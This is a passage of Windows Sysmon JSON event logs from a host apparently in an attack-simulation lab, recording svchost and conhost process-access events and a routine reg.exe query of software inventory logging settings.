05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.373\r\nSourceProcessGUID: {A837DB8D-01F2-5F25-0000-00109CD30400}\r\nSourceProcessId: 4996\r\nSourceThreadId: 5016\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.373","SourceProcessGUID":"{A837DB8D-01F2-5F25-0000-00109CD30400}","SourceProcessId":"4996","SourceThreadId":"5016","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001097D50400}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.388\r\nProcessGuid: {A837DB8D-01F2-5F25-0000-001057D60400}\r\nProcessId: 5056\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352\r\nParentProcessGuid: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nParentProcessId: 5044\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.388","ProcessGuid":"{A837DB8D-01F2-5F25-0000-001057D60400}","Image":"C:\\Windows\\System32\\reg.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Registry Console Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"reg.exe","CommandLine":"C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352","ParentProcessGuid":"{A837DB8D-01F2-5F25-0000-001097D50400}","ParentProcessId":"5044","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
